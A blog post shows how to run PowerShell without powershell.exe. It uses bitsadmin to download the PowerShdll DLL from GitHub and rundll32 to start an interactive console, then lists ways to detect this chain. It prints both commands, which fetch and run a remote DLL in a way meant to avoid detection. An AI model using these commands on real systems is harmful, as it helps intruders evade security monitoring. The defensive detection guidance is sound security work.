In recent times, I have learned about techniques in developing modern malware. One of those techniques was to utilize PowerShell without executing the powershell.exe binary. After finding out, I decided to try with PowerShdll.
This DLL was created by p3nt4 and allows you to execute PowerShell Scripts, commands, encoded commands, and even an interactive shell. Ok, so I could download this on a box and execute it, and boom, now I have PowerShell without PowerShell. I began to think, why not take it a step further. If you’re thinking about it from an adversary’s perspective, and for this particular scenario, we want to execute some PowerShell scripts or commands without triggering any detections.
By taking it a step further, I wanted to start with the classic command prompt. Now I could have immediately gone with another toolset, but I like using Living Off the Land Techniques (This technique has been mentioned in a previous article) . With access to the command prompt, I need to figure out a way to get the PowerShdll onto the system. Fortunately, Microsoft Windows includes plenty of binaries that incorporate some form of download functionality.
These built-in binaries are commonly referred to as LoLBins or Living Off the Land Binaries. For the download functionality, I chose the BITSADMIN LoLBin. According to Microsoft, “BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.” The “download or upload jobs” is exactly what we’re looking for. Now that we have our shell (CMD prompt) and our LoLBin (BITSADMIN), it’s time to download the DLL needed for this test.
bitsadmin /transfer test /priority high https://github.com/p3nt4/PowerShdll/blob/master/dll/bin/x64/Release/PowerShdll.dll?raw=true C:\Users\User\Downloads\test.dll
The command above specifies that we want to use bitsadmin, with a job title of “test” to download the PowerShdll.dll from the Github repository and create a file called test.dll on the local system.
The bitsadmin LoLBin is even nice enough to show the progress of the download.
Now that we have the target dll downloaded, we need a way to invoke it.
Rundll32 has the ability to load and run 32-bit DLLs. Based on the available options for PowerShdll, we want to start an interactive console. According to the options listed on the PowerShdll repo, we can utilize -w (interactive console in new window) or -i (interactive console within the current console).
Here is the command that we’re going to use:
Rundll32 test.dll,main -w
The “main” portion of the command specifies the entry point that we’ll be using within the DLL.
After the command executes successfully, a new window opens up with an interactive PowerShell console…without invoking the actual PowerShell.exe binary.
When viewing the process tree in Process Hacker, this is what you’ll see:
We’ve achieved our objectives of using a LoLBin for download capability and another for executing PowerShell without the PowerShell binary.
Now to turn the table around and look at it from a defensive perspective.
2. How to detect this:
In order to detect this at the earliest part of the execution chain, we should start with the BITSAdmin process. Examples:
- Your Endpoint protection triggers on the BITSAdmin LoLBin.
- Event ID 4688 (A New Process Has Been Created)…this assumes that your host logs are being forwarded to some sort of security monitoring system.
- If you employ a network monitoring capability, you should notice a BITS user agent string.
If you’re attempting to detect the use of PowerShell without the PowerShell binary:
- One method would be to look for the invocation of the System.Management.Automation.dll.
- If you’re looking at the host locally, you can view the threads and dlls invoked by rundll32, or any other process.
In this example, I’ve searched for the System.Management.Automation.dll
For comparison, here’s what it will look like once the process has exited:
So, after experimenting with PowerShell without PowerShell, we can see that it’s pretty effective. Another thing to note is that if you’re not properly monitoring LoLBins for malicious activity, you could be missing quite a bit. While these types of techniques are widely used, there are ways to detect and possibly restrict the use of LoLBins.